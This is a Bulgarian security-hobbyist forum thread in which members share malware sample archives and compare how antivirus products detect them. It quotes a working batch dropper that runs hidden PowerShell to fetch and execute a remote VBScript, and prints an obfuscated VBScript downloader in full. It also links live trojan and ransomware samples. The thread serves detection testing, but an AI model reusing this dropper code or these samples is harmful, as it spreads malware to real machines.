Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции, откриване на нови заплахи - част 18

Featured Replies

преди 8 минути, Лудият Учен написа:

Ами аз маркирах и двата файла и им поисках да се разархивират в друга папка и в действителност COMODO закова веднага заплаха...Иначе си прав,вторият файл действително няма какво да го прави човек...Или поне аз не знам...Поздрави !!!

Отваряйки документа, най-отгоре се посочва сайта "wypr.pl.", който Касперски показва опасен( базата на дефиниции). Явно тук файлът е чист.

 

cc1e10fab505f65e.jpg

  • Отговори 8,9k
  • Прегледи 625,2k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

  • Каква ползва от него тогава, като мълчи като риба? Само за красота и да товари системата ли?

  • При мен пък на тестовата машина с Windows XP SP3 и MS NetFreamwork 4 не иска да се стартира. Явно и вирусите спират поддръжката на XP 

  • Този е за пращане : http://dox.bg/files/dw?a=9f58b3c1f9 https://www.virustotal.com/bg/file/2ee50fd5c9f67e8814142de2009ec4234ee19dec1d4e9189ac5f45c359ed20eb/analysis/1482744276/    

Публикувани изображения

https://www.upload.ee/files/9744405/samples.zip.html

Три зловредни файла...

Първия и третия файлове засега нищо не ги лови,може и да са безопасни,но знае ли човек...

преди 36 минути, Лудият Учен написа:

https://www.upload.ee/files/9744405/samples.zip.html

Три зловредни файла...

Първия и третия файлове засега нищо не ги лови,може и да са безопасни,но знае ли човек...

Цитат

25.3.2019 г. 20:42:05 ч.    Удалено    UDS:DangerousObject.Multi.Generic    D:\Downloads\Compressed\samples\26ee6f7c33a40eb215b27340313c54cf    Высокая    
25.3.2019 г. 20:42:05 ч.    Удалено    троянская программа UDS:Trojan-Dropper.Win32.Agent    D:\Downloads\Compressed\samples\26ee6f7c33a40eb215b27340313c54cf//Sili Anti Virus Scanner.exe    Высокая    

 

преди 7 часа, Gangosa написа:

Внимавайте , като отворите линка ще видите линкове , които са без парола!

https://pastebin.com/sk0Nt6HM

Symantec не намира нищо в това файлче...Мерси за линка Gangosa !!!

Screenshot_1.png

Ако става въпрос за другите линкове,то става въпрос за 140 линка...Кой по-напред...

https://www.upload.ee/files/9752891/shadowhammer__1_.rar.html

https://www.virustotal.com/#/file/03466caff060a816688eb35f10b9bf3b8d44c364fde620cbb4e2c0c23309df79/detection

COMODO с детекция ...Според ВИРУСТОТАЛ го ловят само две програми,но май не е верно хич даже...

Screenshot_1.png

И от мен файлче: https://www.upload.ee/files/9752796/a.rar.html

Screenshot-1.png

https://www.virustotal.com/bg/file/a596d5abb1532c1dbb5c13744ac0874bb3cfa661d652926a6ca2497170a9812e/analysis/1553702141/

Есет-реакцията е същата при посещаване на сайта и при разархивиране.

Screenshot-2.png

Comodo-HIPS

Screenshot-3.png  Screenshot-4.png  Screenshot-5.png 

След настойчивите предупреждения се появи следния файл

Screenshot-6.png

 

Резултатът в Тотал-а различен от първия: https://www.virustotal.com/bg/file/a2a4b65e18812627361ce9ec7fb430c0980f9dd62c5103c4af76db3dbe97dac2/analysis/1553702099/

 

преди 2 часа, Лудият Учен написа:

https://www.upload.ee/files/9752891/shadowhammer__1_.rar.html

https://www.virustotal.com/#/file/03466caff060a816688eb35f10b9bf3b8d44c364fde620cbb4e2c0c23309df79/detection

COMODO с детекция ...Според ВИРУСТОТАЛ го ловят само две програми,но май не е верно хич даже...

Screenshot_1.png

Eset

Screenshot-7.png

преди 59 минути, NIKISHARK написа:

И от мен файлче: https://www.upload.ee/files/9752796/a.rar.html

 

  Затвори скритото съдържание

 

Screenshot-1.png

 

https://www.virustotal.com/bg/file/a596d5abb1532c1dbb5c13744ac0874bb3cfa661d652926a6ca2497170a9812e/analysis/1553702141/

Есет-реакцията е същата при посещаване на сайта и при разархивиране.

Screenshot-2.png

Comodo-HIPS

Screenshot-3.png  Screenshot-4.png  Screenshot-5.png 

След настойчивите предупреждения се появи следния файл

Screenshot-6.png

 

Резултатът в Тотал-а различен от първия: https://www.virustotal.com/bg/file/a2a4b65e18812627361ce9ec7fb430c0980f9dd62c5103c4af76db3dbe97dac2/analysis/1553702099/

 

Eset

Screenshot-7.png

Касперски каза, че е чист. Отворих го, пусна се конзолата два пъти и нищо.

 

преди 7 минути, Eclipse2G написа:

 

Корекция, изтри .vbs файла.

преди 3 часа, Лудият Учен написа:

https://www.upload.ee/files/9752891/shadowhammer__1_.rar.html

https://www.virustotal.com/#/file/03466caff060a816688eb35f10b9bf3b8d44c364fde620cbb4e2c0c23309df79/detection

COMODO с детекция ...Според ВИРУСТОТАЛ го ловят само две програми,но май не е верно хич даже...

Screenshot_1.png

Касперски го схруска. ;)

27.03.2019 19.16.02    Detected object (file) deleted    C:\Users\Evgeni\Desktop\Setup.ex_    File: C:\Users\Evgeni\Desktop\Setup.ex_    Object name: HEUR:Trojan.Win32.ShadowHammer.gen    Object type: Trojan program    Time: 3/27/2019 7:16 PM

От предния архив.
27.03.2019 19.15.55    Detected object (file) deleted    C:\Users\Evgeni\Desktop\index.vbs    File: C:\Users\Evgeni\Desktop\index.vbs    Object name: HEUR:Trojan-Downloader.Script.Generic    Object type: Trojan program    Time: 3/27/2019 7:15 PM

 

 

преди 12 минути, Станислав Маринов написа:

Стартиран батчик в пясъка...

Screenshot - 27.3.2019 г. , 19_10_13.png

1. Защо пътят до локален файл е с две наклонени \\ и след като не си в системен диск(d:\windows\system32), защо очакваш cmd.exe да е в c:\windows\system32
2. Защо стартираш poweshell през cmd, след като вече си в cmd

Редактирано от DarkEdge (преглед на промените)

преди 35 минути, DarkEdge написа:

Покажи съдържанието на bat  файла тук

файла е този който го предлага NIKISHARK  в горния линк със скрииншотовете

Той тества ХИПС-а на Комодо,аз тествам пясъчника...

NIKISHARK

И от мен файлче: https://www.upload.ee/files/9752796/a.rar.html

  •  
  • start c:\\Windows\\System32\\cmd.exe /k powershell.exe -w hidden -nop -ep bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=gmjVh8Fa','index.vbs');
    start c:\\Windows\\System32\\cmd.exe /c cscript.exe index.vbs"
  • хакерът е указал дял С,а моя системен дял е D
  • промених съдържанието на бата на D и стартирах ието вече
  • 787623936_Screenshot-27.3_2019.20_57_36.png.4a14241443cd09c2950c570ca336e039.png

Screenshot - 27.3.2019 г. , 20_58_14.png

Цитат

start %windir%\System32\cmd.exe /k powershell.exe -w hidden -nop -ep bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=gmjVh8Fa','index.vbs')
start %windir%\System32\cmd.exe /c cscript.exe index.vbs

 

Скрипта е интересен.  Някой разгледа ли го по-подробно или?

diM aYlUwnGtNXlmGHSsTmqHLwtkfoNb, cwfLGPgaNXZSuLaVlRscvtAKHBOI, drvKjPbiTGLqWqAxIjzCuxWWxRsI
sub pHHRgfJzukLUSdQoTMPCGaLhxNBP
aYLuWNGTnxlMGHsStmQhLWTkFONB = "-448+531*530351/5251*535572/4617*9245-9213*548895/4945*-7670+7768*-6820+6926*392420/5606*2202-2119*-1820+1899*-4885+4946*-7835+7902*-2993+3107*-4203+4304*-7053+7150*26680/230*-848+949*45899/581*7460-7362*1496-1390*1079-978*837936/8464*1288-1172*89240/2231*145588/4282*7955-7872*4972-4873*3801-3687*-6759+6864*7579-7467*-87+203*293685/2797*-1338+1448*-5049+5152*-1054+1100*8333-8263*89250/850*2322-2214*619635/6135*-3805+3888*-4520+4641*467245/4063*6303-6187*395213/3913*666-557*7927-7848*196294/2003*-3194+3300*-7692+7793*6006-5907*-1411+1527*233988/6882*-3917+3958*-4834+4847*2880/288*91156/7012*14440/1444*-2184+2257*630258/6179*7411-7379*6165-6092*1471-1356*247-171*-240+337*8913-8801*551812/4757*7709-7598*793744/7087*-6827+6867*154976/4843*-6154+6188*1861-1815*-3348+3382*7344-7312*-5865+5906*1981-1949*242508/2887*72904/701*5263-5162*-8280+8390*108147/8319*81860/8186*266784/8337*4191-4159*4870-4838*6647-6560*155127/1869*5933-5834*5322-5208*10069-9964*458864/4097*-6218+6334*146372/3182*8464-8395*-4721+4820*969904/9326*606-495*-2748+2780*294950/8675*282030/8295*4541-4528*-5097+5107*250656/7833*-7855+7887*-9039+9071*793397/9559*5585-5484*-1815+1931*-988+1020*4326-4215*9384-9286*-4678+4784*-1877+1955*221291/2191*1312-1196*-7783+7815*5216-5155*3489-3457*5629-5562*-9077+9191*355-254*-1945+2042*2990-2874*5518-5417*4996-4917*827708/8446*605260/5710*855571/8471*-9759+9858*-6512+6628*7187-7147*-8298+8332*573852/6596*1985-1902*7866-7767*-7211+7325*1250-1145*1299-1187*-7920+8036*-8682+8728*251394/3223*-5960+6061*894128/7708*-8657+8776*807303/7273*758670/6655*368294/3442*243236/7154*2736-2695*9102-9089*-7234+7244*257824/8057*-8149+8181*21536/673*1080770/9398*-595+711*-631+745*224249/3347*-5401+5512*-9360+9469*588448/5254*-2475+2553*968448/9984*5409-5300*-256+357*2870-2838*189649/3109*8501-8469*-4419+4530*-4090+4188*4815-4709*548-470*4907-4806*-4787+4903*-1897+1943*-4640+4707*683094/6154*8198-8089*6186-6074*5952-5835*1681-1565*2120-2019*217854/1911*44538/571*-5695+5792*726703/6667*927584/9184*-3917+3930*-9930+9940*248896/7778*3605-3573*2316-2284*601009/8233*-6160+6230*-9836+9868*8185-8077*-419+520*3576-3474*4609-4493*6353-6313*213900/1860*94308/813*65664/576*234701/3503*3060-2949*355558/3262*-2945+3057*-2140+2218*26675/275*6750-6641*7159-7058*-3040+3084*8736-8685*8697-8656*50272/1571*7780-7719*-7313+7345*-3150+3184*4677-4610*209174/3122*2612-2534*133314/3921*-5709+5741*-676+760*4324-4252*195477/2833*579150/7425*3407-3394*-2333+2343*-3418+3450*-9186+9218*9842-9810*137920/4310*303904/9497*8988-8956*-2081+2113*4701-4669*292448/9139*-1522+1633*1025505/8765*-5610+5726*-8725+8795*4261-4156*4526-4418*749319/7419*7385-7324*3502/103*-6338+6443*-1201+1311*5245-5143*6743-6709*-2439+2452*-4454+4464*9634-9602*10496/328*7767-7735*9571-9539*172704/5397*4860-4828*-2161+2193*7382-7350*235648/7364*1586-1503*-4458+4559*-6674+6790*8900-8868*723165/6515*7688-7590*4309-4203*606410/8663*7153-7048*5173-5065*-5727+5828*-4131+4163*6103-6042*-7767+7799*1634-1523*398370/4065*-8514+8620*9398-9328*-9164+9247*5914-5835*6421-6375*-5740+5807*-3366+3480*10055-9954*723717/7461*558888/4818*4499-4398*5996-5912*910616/9016*428520/3571*841116/7251*-2063+2133*703605/6701*1007-899*1533-1432*7252-7212*108558/978*2230-2113*-4331+4447*7427-7357*952140/9068*-8468+8576*-1338+1439*415448/9442*457800/5450*592002/5193*-1224+1341*-2089+2190*-6393+6434*14495/1115*-9207+9217*7717-7685*-3845+3877*-2870+2902*9488-9456*259264/8102*-1679+1711*79552/2486*9760-9728*-7033+7065*995-884*6503-6405*9791-9685*-2344+2414*1762-1657*-5390+5498*-3230+3331*-5755+5801*315114/3622*349182/3063*202860/1932*-3711+3827*-5533+5634*316320/9885*104856/3084*580090/8287*-2036+2144*928775/9575*1464-1361*-998+1056*-3126+3158*222222/2886*-4329+4434*-2746+2854*821219/6901*6532-6484*-5785+5899*377685/3465*-7822+7871*-1725+1782*-5582+5639*-2351+2407*296378/8717*1617-1585*9429-9391*-7915+7947*-3977+4095*-8659+8757*-7155+7222*8113-7999*8887-8811*-6109+6211*-6622+6635*8161-8151*7657-7625*3648-3616*-7870+7902*-2160+2192*202432/6326*5279-5247*8219-8187*238176/7443*281248/8789*987678/8898*10043-9945*2885-2779*7174-7104*756945/7209*2946-2838*-7156+7257*94668/2058*-4180+4247*187596/1737*3460-3349*955765/8311*-1198+1299*-8889+8902*7588-7578*-5417+5449*208032/6501*8582-8550*9282-9213*1418-1308*373-273*1427-1395*717444/9828*-3471+3573*3812-3799*63050/6305*8062-7993*1878-1770*-7996+8111*-8113+8214*15249/1173*56900/5690*2269-2237*219872/6871*68288/2134*2623-2536*9995-9912*4269-4170*3943-3829*-555+660*2135-2023*-2524+2640*1890-1844*-4631+4700*-2870+2969*-272+376*961815/8665*2798-2766*-4082+4116*195058/5737*53339/4103*1694-1684*6272-6203*5168-5058*795300/7953*133-101*-9913+9986*-777+879*-4783+4796*65900/6590*7106-7093*8393-8383*320320/4576*-5565+5682*-4828+4938*-1855+1954*734744/6334*5131-5026*455-344*-2555+2665*7168-7136*2653-2580*1426-1311*106856/1406*7462-7365*-2725+2837*220-104*7331-7220*1175-1063*-3327+3367*9638-9606*-5178+5287*-8613+8734*9444-9377*395382/3562*5212-5103*-5994+6106*5491-5374*-3285+3401*72417/717*8080-7966*-530+562*-2958+2999*7136-7123*57020/5702*-522+554*-7458+7490*133760/4180*228416/7138*9514-9435*1560-1450*9943-9911*8043-7974*132126/1159*-4715+4829*-3465+3576*4613-4499*150880/4715*-742+824*4660-4559*-35+150*411021/3513*640375/5875*-4488+4589*4697-4665*8551-8473*6185-6084*76920/641*-8749+8865*40495/3115*-2218+2228*-736+768*1349-1317*57600/1800*8932-8900*8145-8062*122210/1210*9130-9014*-5333+5365*5851-5740*133966/1367*998-892*-1531+1618*9860-9783*-2208+2281*6690-6607*5115-5014*-9779+9893*-8037+8155*3189-3084*93456/944*870923/8623*6949-6917*263398/4318*60064/1877*4434-4363*903849/8949*4499-4383*499675/6325*10049-9951*669602/6317*-3742+3843*720-621*425372/3667*308000/7700*221056/6908*153340/4510*-380+499*-3827+3932*-6854+6964*944921/8669*9345-9242*2426-2317*2959-2843*-7318+7433*1853-1795*7830-7783*458156/9748*9700-9666*316896/9903*9021-8983*-4226+4258*-4302+4411*4109-3988*626517/9351*9236-9125*-1194+1303*-7329+7441*-2114+2231*223416/1926*4895-4794*282606/2479*1968-1936*5175-5137*4348-4316*132362/3893*-9653+9700*3985-3871*8343-8232*363636/3276*224-108*3927-3880*3500-3401*731220/6964*-1490+1599*-5291+5409*125700/2514*-5677+5711*-9816+9848*3878-3837*-188+201*49580/4958*-514+546*-5714+5746*-1534+1566*101184/3162*-4149+4232*-6256+6357*-7271+7387*68800/2150*7622-7523*729492/6572*-9161+9269*439679/6023*-8382+8498*-8402+8503*52211/479*4559-4444*9394-9362*106506/1746*69824/2182*-9696+9807*522928/5336*1058516/9986*502164/5772*578116/7508*583489/7993*8456-8373*895466/8866*68400/600*889602/7539*-5492+5597*599148/6052*279467/2767*3808-3762*-7602+7671*474600/3955*-367+468*986535/9965*-6581+6662*1022463/8739*-4089+4190*8716-8602*1755-1634*728-688*-9282+9314*21964/646*-6110+6193*-3840+3941*-8419+8527*812-711*-5292+5391*9503-9387*-3826+3858*2538-2496*-9410+9442*-5039+5141*5106-4992*7308-7197*1019-910*-8186+8218*4202-4115*-1999+2104*756-646*9009-8958*63750/1275*-3070+3165*475332/7202*-380+477*343824/2964*646816/5576*5348-5247*-2706+2820*1436-1315*133858/3937*-5512+5544*8234-8193*5299-5286*6856-6846*-6640+6672*8217-8185*297312/9291*246496/7703*43289/593*770615/6701*593864/7814*570845/5885*931504/8317*2991-2875*-9260+9371*5146-5034*83072/2596*9586-9525*-616+648*457240/6532*3888-3791*-3157+3265*32430/282*947380/9380*-6663+6676*77900/7790*2260-2228*1232-1200*-428+460*1742-1710*5956-5886*-8735+8846*-2724+2838*-2713+2745*8714-8645*861166/8878*531036/5364*598520/5755*3034-3002*-9805+9916*212562/2169*3878-3772*-4727+4800*389412/3357*-6281+6382*-2489+2598*-7343+7375*-8025+8130*753280/6848*117312/3666*-1123+1222*617493/5563*3247-3139*-2798+2871*358208/3088*4392-4291*5598-5489*1656-1541*46007/3539*6968-6958*-9271+9303*7657-7625*8585-8553*2885-2853*-4288+4320*4403-4371*9313-9281*893-861*512168/7016*2323-2208*590824/7774*-5407+5504*995680/8890*941456/8116*7989-7878*413280/3690*3598-3566*7506-7445*6880-6848*8736-8652*-8864+8978*417573/3569*689-588*9483-9470*80710/8071*-6686+6718*43136/1348*228352/7136*228064/7127*1627-1549*119786/1186*1129320/9411*877540/7565*7902-7889*1501-1491*2400-2368*44672/1396*-5807+5839*-9500+9532*298278/4086*7439-7337*316544/9892*1980-1911*-3704+3818*5929-5815*291104/9097*542724/6461*-2865+2969*984952/9752*765820/6962*2009-1977*5308-5239*5868-5754*-3252+3366*3422-3376*2550-2483*122580/1135*1794-1693*-3646+3743*-2103+2217*-3621+3634*8450-8440*56448/1764*161504/5047*1570-1538*44992/1406*722850/9150*465630/4233*236992/7406*8751-8682*894216/7844*-8752+8866*622488/5608*948480/8320*185504/5797*-5283+5354*645687/5817*-3712+3828*76479/689*-3914+3946*4313-4265*-7105+7118*7630/763*6798-6729*-3150+3260*8633-8533*-123+155*4826-4756*127413/1089*431640/3924*-4260+4359*587192/5062*159600/1520*-7007+7118*2541-2431"
CwfLgPGANXzsUlavlrSCVtAkhboi = SpLiT(AYluWNgtnxLMghssTmQHlwtkFoNb, CHR(eval(-9676+9718)))
foR eACH czngRPoLJPaiqXZHSUanjTKIamIL In CWflGpGAnxZsuLaVlRsCVTakhboI
DrVKJPbITGlQwQAxIJZcuXwWXRSi = drvkjpbITglqWQaXIjzcUXwWxRsi & chr(eVAL(CzNGRPOLjPAiqXzhsuaNJTKIaMil))
next
JaHDJjzboWzDSCVgpSEkHkOzURog
end SUB
sUb JAHdjjzbOwzdScVgpsEkhKOzuROG
evAL(execuTe(DrVKJpBItGLQwQAxIjZCUXWwxRSi))
end SUB
PhHRGfjZukLUsDqoTMPCGALhXnbP

 

https://www.upload.ee/files/9757599/19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b.zip.html

Един крипто гадняр...Symantec с детекция...

Извинявам се ,объркал съм датата,доста е старичък щамът...

Screenshot_1.png

https://www.upload.ee/files/9757651/zerokit-master__1_.zip.html

https://www.virustotal.com/#/file/e132eda6a7e50fa8ce3a5e4d1d413a50bf07da917a7177d3ac874d75b078b850/detection

Ето нещо по-свежо ,архив със съмнителна репутация...

преди 1 час, Лудият Учен написа:

https://www.upload.ee/files/9757599/19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b.zip.html

Един крипто гадняр...Symantec с детекция...

Извинявам се ,объркал съм датата,доста е старичък щамът...

Screenshot_1.png

https://www.upload.ee/files/9757651/zerokit-master__1_.zip.html

https://www.virustotal.com/#/file/e132eda6a7e50fa8ce3a5e4d1d413a50bf07da917a7177d3ac874d75b078b850/detection

Ето нещо по-свежо ,архив със съмнителна репутация...

Само като видях името на антивируса, която го е засекла (във VT), ме напуши един смях....(за Zerokit master).

А от първия архив:

Цитат

28.03.2019 19.03.05    Detected object (file) deleted    C:\Users\Evgeni\Desktop\19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b    Application: Windows Explorer    File: C:\Users\Evgeni\Desktop\19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b    Time: 3/28/2019 7:03 PM    Object name: HEUR:Trojan.Win32.Generic
28.03.2019 19.03.05    Detected object (file) moved to Quarantine    C:\Users\Evgeni\Desktop\19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b    Application: Windows Explorer    File: C:\Users\Evgeni\Desktop\19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b    Time: 3/28/2019 7:03 PM    Object name: HEUR:Trojan.Win32.Generic
28.03.2019 19.03.04    Detected object (file) deleted    C:\Users\Evgeni\Desktop\19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b:Zone.Identifier    Application: Windows Explorer    File: C:\Users\Evgeni\Desktop\19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b:Zone.Identifier    Time: 3/28/2019 7:03 PM    Object name: HEUR:Trojan.Win32.Generic
28.03.2019 19.02.51    Object (file) detected    C:\Users\Evgeni\Desktop\19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b    Application: Windows Explorer    File: C:\Users\Evgeni\Desktop\19d1aaef16cf892bd8e0ea37fff29feeb540fd122b288b7aae4a4212a2dbd93b    Time: 3/28/2019 7:02 PM    Object name: HEUR:Trojan.Win32.Generic

 

току-що, Eclipse2G написа:

Само като видях името на антивируса, която го е засекла (във VT), ме напуши един смях....(за Zerokit master).

А бре,човек и AVIRA го лови...

преди 2 минути, Лудият Учен написа:

А бре,човек и AVIRA го лови...

Да, видях. Но Вирус тотала се излага. Касперски също си трае.

преди 7 минути, Лудият Учен написа:

https://www.upload.ee/files/9787121/samples.zip.html

12 зловредни файла...AVAST 9/12 детекция...

Цитат

4.4.2019 г. 18:50:43 ч.    Удалено    троянская программа UDS:Trojan.Win32.Inject.wnnk   😄\Downloads\samples\1675afb65f32c7b148f5d8acbeed2acc    Высокая    
4.4.2019 г. 18:50:44 ч.    Удалено    UDS:DangerousObject.Multi.Generic    C:\Downloads\samples\c55f1145ecc9ea52b2872a99a3f04eb4    Высокая    
4.4.2019 г. 18:50:44 ч.    Удалено    троянская программа UDS:Trojan.Win32.Inject.wnnk    C:\\Downloads\samples\08c984ac6b0e0a291f16d0c249310a14    Высокая    
4.4.2019 г. 18:50:45 ч.    Удалено    троянская программа VHO:Trojan.Win32.Dllhijack.os    C:\\Downloads\samples\bbeba6edfea62c34ab92a60e86fd7ce7    Высокая    
4.4.2019 г. 18:50:46 ч.    Будет вылечено при перезагрузке компьютера    UDS:DangerousObject.Multi.Generic    C:\Downloads\samples\8dedd426a43b7b012b215ac08ead4dcc    Высокая    
4.4.2019 г. 18:50:48 ч.    Удалено    UDS:DangerousObject.Multi.Generic    C:\Downloads\samples\ec52a11625bdb4aad3740ff8cc6d8c0f    Высокая    
4.4.2019 г. 18:50:49 ч.    Удалено    UDS:DangerousObject.Multi.Generic   😄\Downloads\samples\71f512da26deeeceb7e41fbb6a5e3267    Высокая    
4.4.2019 г. 18:50:51 ч.    Удалено    UDS:DangerousObject.Multi.Generic    C:\Downloads\samples\43b57414a07f69aa87ad3ec85fb06b6d    Высокая    
 

 

Редактирано от nikssi (преглед на промените)

Регистрирайте се или влезете в профила си за да коментирате

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.